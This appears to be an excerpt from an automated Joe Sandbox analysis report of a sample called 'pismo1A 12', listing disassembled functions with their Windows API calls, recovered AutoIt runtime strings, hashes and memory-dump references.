Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 379a2d54a08924458e048856163053defc2a8d8410610b2bee7024368f8e8c27
Instruction ID: bdb029c2347e80aa6162bfe96e142aaa74afeb96ea40b181d30af296462ac3de
Opcode Fuzzy Hash: 379a2d54a08924458e048856163053defc2a8d8410610b2bee7024368f8e8c27
Instruction Fuzzy Hash: 4541A271A00318EBEB219F64CC49FEA77A9EF08354F10456AF958E7282D7799D80CB94

Function 0070BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0070BCFD
IsMenu.USER32(00000000), ref: 0070BD1D
CreatePopupMenu.USER32 ref: 0070BD53
GetMenuItemCount.USER32(01135538), ref: 0070BDA4
InsertMenuItemW.USER32(01135538,?,00000001,00000030), ref: 0070BDCC

Strings

2, xrefs: 0070BD37
0, xrefs: 0070BCA8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: e15940d0c594f4b55b1a0e3cfc0f76022ed774fbb8575c9eb6f826f8def59dbd
Instruction ID: e781e6b422de8a4c6050cc2fe2abd404de3dd0132d502059472d1c8185f3da29
Opcode Fuzzy Hash: e15940d0c594f4b55b1a0e3cfc0f76022ed774fbb8575c9eb6f826f8def59dbd
Instruction Fuzzy Hash: 25518C70B00206DBDB11DFA8D888BAEFBF4EF45314F248359E851A72D1D778AA41CB61

Function 006C2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006C2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 006C2D53
_ValidateLocalCookies.LIBCMT ref: 006C2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 006C2E0C
_ValidateLocalCookies.LIBCMT ref: 006C2E61

Strings

&Hl, xrefs: 006C2DFE, 006C2E07, 006C2E18
csm, xrefs: 006C2DF6

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &Hl$csm
API String ID: 1170836740-4116197483
Opcode ID: 7a3317b2834f6507b164700657ab0c313f73f2ce6f2bd3ed6dbee2f93cf0141c
Instruction ID: 0d29d31292b4b29cb9f6e7581d01cb0436a767d86ae912dcaf92a35d2315130d
Opcode Fuzzy Hash: 7a3317b2834f6507b164700657ab0c313f73f2ce6f2bd3ed6dbee2f93cf0141c
Instruction Fuzzy Hash: 8F417D34A0121AABCF10DF68C855FEEBBA6FF45324F14815DEC156B392D735AA058BD0

Function 0070C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0070C913

Strings

stop, xrefs: 0070C8E4
question, xrefs: 0070C8CC
warning, xrefs: 0070C8FC
blank, xrefs: 0070C895
info, xrefs: 0070C8B4

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: a99b4ab2531d7ed9893fed863820c7daf0af2be6086a4a7e6e969445636f30c9
Instruction ID: 5397dc70f6aeb85e6fe6bfdccfcf3bec69056bdb712c17351fd9099dda0895ba
Opcode Fuzzy Hash: a99b4ab2531d7ed9893fed863820c7daf0af2be6086a4a7e6e969445636f30c9
Instruction Fuzzy Hash: 0B113D31699306FEE7069B549C83DAA37DCDF15314B50432EF904A62C2EB7CAD00526C

Function 0070ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0070ED2A
_wcslen.LIBCMT ref: 0070ED3B
_wcslen.LIBCMT ref: 0070ED79
_wcslen.LIBCMT ref: 0070EDAF
_wcslen.LIBCMT ref: 0070EDDF
_wcslen.LIBCMT ref: 0070EDEF
_wcslen.LIBCMT ref: 0070EE2B
_wcslen.LIBCMT ref: 0070EE5A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: b61a9f75af1a684bfbb5d59f464a6e812829a6b16625da331b88d4e9504bc262
Instruction ID: f22307143735fd4b2f16dd9c98649b12660cd00f7627b35eb66948724ecfb1a6
Opcode Fuzzy Hash: b61a9f75af1a684bfbb5d59f464a6e812829a6b16625da331b88d4e9504bc262
Instruction Fuzzy Hash: C641B265D10118A5DB51EBB4C88AEEFB3A9EF05300F00896AF518E3162FB38D345C3E9

Function 006BF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 006BF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 006FF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 006FF454

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e8f5aa203bc6a2a8a10804c7c3fe70f936736e9c5dc57fed03ee6af826dc8fd7
Instruction ID: a8adc72360d65884a754bca8c39e32ccc1f5614dd7fced4218077cc905cd815a
Opcode Fuzzy Hash: e8f5aa203bc6a2a8a10804c7c3fe70f936736e9c5dc57fed03ee6af826dc8fd7
Instruction Fuzzy Hash: C44127B1208684FAD739AB2C8C887FA7B93AF46310F14843CF18762771C636A8C1CB51

Function 00732D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00732D1B
GetDC.USER32(00000000), ref: 00732D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00732D2E
ReleaseDC.USER32(00000000,00000000), ref: 00732D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00732D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00732D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00735A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00732DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00732DE1

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 21e64d54f580702d1a1912796979b2912e3c9ee8f7556491cd1969573bea250e
Instruction ID: 78f5528b231cea22f1daed53db4f97907a23b58769e11783f317945fc296fe3b
Opcode Fuzzy Hash: 21e64d54f580702d1a1912796979b2912e3c9ee8f7556491cd1969573bea250e
Instruction Fuzzy Hash: 81317F72211214BFFB154F50CC8AFEB3BA9EF09715F048055FE48AA292C6799C51C7A4

Function 00705622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00705637
_memcmp.LIBVCRUNTIME ref: 00705659
_memcmp.LIBVCRUNTIME ref: 00705671
_memcmp.LIBVCRUNTIME ref: 00705684
_memcmp.LIBVCRUNTIME ref: 0070569E
_memcmp.LIBVCRUNTIME ref: 007056B1
_memcmp.LIBVCRUNTIME ref: 007056C9
_memcmp.LIBVCRUNTIME ref: 007056E4

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c4c3895884d6902ef942380dfa778056d4f62e6c0861534c8b480569b1c4c115
Instruction ID: ed8518851f9937a7f8cf0e73158f05d70b28eb6d072aabc40216d14ec0fcbfd0
Opcode Fuzzy Hash: c4c3895884d6902ef942380dfa778056d4f62e6c0861534c8b480569b1c4c115
Instruction Fuzzy Hash: 4421ADA1A40A05F7E31455218E52FBB33DDEF22784F440128FD099E5C2FB69DD108DB9

Function 00724FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0072502E, 00725383
Not an Object type, xrefs: 00725007

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 38f09be446ffcfc5d35fb626518d57f745193c5f794389147986632b2ccb65e2
Instruction ID: be65074d9d011d5332834c9a3381afebb6b6310c2413ef7623a9d95b09fbb76b
Opcode Fuzzy Hash: 38f09be446ffcfc5d35fb626518d57f745193c5f794389147986632b2ccb65e2
Instruction Fuzzy Hash: 2ED1C1B1A0061ADFDF10CFA8D885BAEB7B5FF48354F148069E915AB281E774DD41CBA0

Function 006E1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 006E15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,006E17FB,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E16FB

Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,006E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 006E1777
__freea.LIBCMT ref: 006E17A2
__freea.LIBCMT ref: 006E17AE

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 0bd21dbb0cf52d9fe9ed0fea10904a6379a7212a2e1d18384357711c23731383
Instruction ID: 053613ba5cfd1afc2df840d98f663bdbc245760dc1cddd83b12b0a8d95f016c0
Opcode Fuzzy Hash: 0bd21dbb0cf52d9fe9ed0fea10904a6379a7212a2e1d18384357711c23731383
Instruction Fuzzy Hash: 3791C3B1E023969ADF208F66C851EEE7BB7AF46710F184659E801EF281D735CC41E760

Function 00724523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00724648
VariantInit.OLEAUT32(?), ref: 00724749
VariantClear.OLEAUT32(?), ref: 00724753
VariantClear.OLEAUT32(?), ref: 007247B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 007245D8, 00724706, 007247BE
Incorrect Object type in FOR..IN loop, xrefs: 0072472C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 0c5f62781f837d692653a42d8d6b85c2f9c8b8c4b881ee5e2f7f2ae529fb107d
Instruction ID: 4cf698dd3b6620254701e5ce9f2517a139e1c297c23de639e96a39c7dc35b9e4
Opcode Fuzzy Hash: 0c5f62781f837d692653a42d8d6b85c2f9c8b8c4b881ee5e2f7f2ae529fb107d
Instruction Fuzzy Hash: 6B918171A00229AFDF24CFA5DC44FAEBBB8EF46714F108559F515AB280D7789941CFA0

Function 00711187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0071125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00711284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007112A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007112D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0071135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007113C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00711430

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: e7b3062cc38f9832a865a7d9c032b0ce7d83b36216158a3da8a5abd08f2af648
Instruction ID: 20c32ee22c62c093d157fcdc517d76fdd788cc21333e279b8b39031b0eb59e6a
Opcode Fuzzy Hash: e7b3062cc38f9832a865a7d9c032b0ce7d83b36216158a3da8a5abd08f2af648
Instruction Fuzzy Hash: E991E271A00219AFDB00DF98D885BFEB7B5FF45721F508029EA11EB2D1D778A981CB94

Function 006B948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 060ccb2ee82987efa59744b60244de6ada397a5d839e018a3480cc62bb8cfb1f
Instruction ID: f1f73779abcdb90fa9237277cb0e0ef1bdf9e94e8bb647d57fe949b4803e9e43
Opcode Fuzzy Hash: 060ccb2ee82987efa59744b60244de6ada397a5d839e018a3480cc62bb8cfb1f
Instruction Fuzzy Hash: 5F913BB1D40219EFCB15CFA9CC84AEEBBB9FF49320F148059E615B7251D374A982CB60

Function 00723947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0072396B
CharUpperBuffW.USER32(?,?), ref: 00723A7A
_wcslen.LIBCMT ref: 00723A8A
VariantClear.OLEAUT32(?), ref: 00723C1F

Part of subcall function 00710CDF: VariantInit.OLEAUT32(00000000), ref: 00710D1F
Part of subcall function 00710CDF: VariantCopy.OLEAUT32(?,?), ref: 00710D28
Part of subcall function 00710CDF: VariantClear.OLEAUT32(?), ref: 00710D34

Strings

Incorrect Parameter format, xrefs: 007239A6, 00723BA1
AUTOIT.ERROR, xrefs: 00723A80, 00723A85

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 59299c971f64fadd903ab23bf4a5e6858043fc1c7f72e9230240a41144973157
Instruction ID: 4b3fc35fff0fc3c59555560437e6400fe5faa93f1c9d424c32ed5b72e1484e55
Opcode Fuzzy Hash: 59299c971f64fadd903ab23bf4a5e6858043fc1c7f72e9230240a41144973157
Instruction Fuzzy Hash: AD9166746083119FC704EF24D48096AB7E5FF89314F14892EF88A9B351DB38EE45CB92

Function 00724BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0070000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?,?,0070035E), ref: 0070002B
Part of subcall function 0070000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700046
Part of subcall function 0070000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700054
Part of subcall function 0070000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?), ref: 00700064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00724C51
_wcslen.LIBCMT ref: 00724D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00724DCF
CoTaskMemFree.OLE32(?), ref: 00724DDA

Strings

NULL Pointer assignment, xrefs: 00724E23, 00724E52

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: b51ecef038ccbd38a433ad4c069716e5cfb62183e03e6dc19531fdd0384018c5
Instruction ID: 2d972757bc61be8a74bc4331ec10abe0a83991ea254c3b8180d4324193865d4a
Opcode Fuzzy Hash: b51ecef038ccbd38a433ad4c069716e5cfb62183e03e6dc19531fdd0384018c5
Instruction Fuzzy Hash: 2D910971D00229EFDF15DFA4D891AEEB7B9BF08310F10856AE915A7251DB385E44CFA0

Function 007320FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00732183
GetMenuItemCount.USER32(00000000), ref: 007321B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007321DD
_wcslen.LIBCMT ref: 00732213
GetMenuItemID.USER32(?,?), ref: 0073224D
GetSubMenu.USER32(?,?), ref: 0073225B

Part of subcall function 00703A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00703A57
Part of subcall function 00703A3D: GetCurrentThreadId.KERNEL32 ref: 00703A5E
Part of subcall function 00703A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007025B3), ref: 00703A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007322E3

Part of subcall function 0070E97B: Sleep.KERNEL32 ref: 0070E9F3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 24d2b13c9f865277428736f34d90d3041306f6e65e21f118c648318165fceb2d
Instruction ID: 48a4ffd9677a205a698f53098e47c5e565d72c94340dd1854a8564764a8b04ca
Opcode Fuzzy Hash: 24d2b13c9f865277428736f34d90d3041306f6e65e21f118c648318165fceb2d
Instruction Fuzzy Hash: D7717E75A00215AFDB50EF64C845AAEB7F6FF48320F158459E816EB352DB38ED428B90

Function 0070AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0070AEF9
GetKeyboardState.USER32(?), ref: 0070AF0E
SetKeyboardState.USER32(?), ref: 0070AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0070AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0070AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0070AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0070B020

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
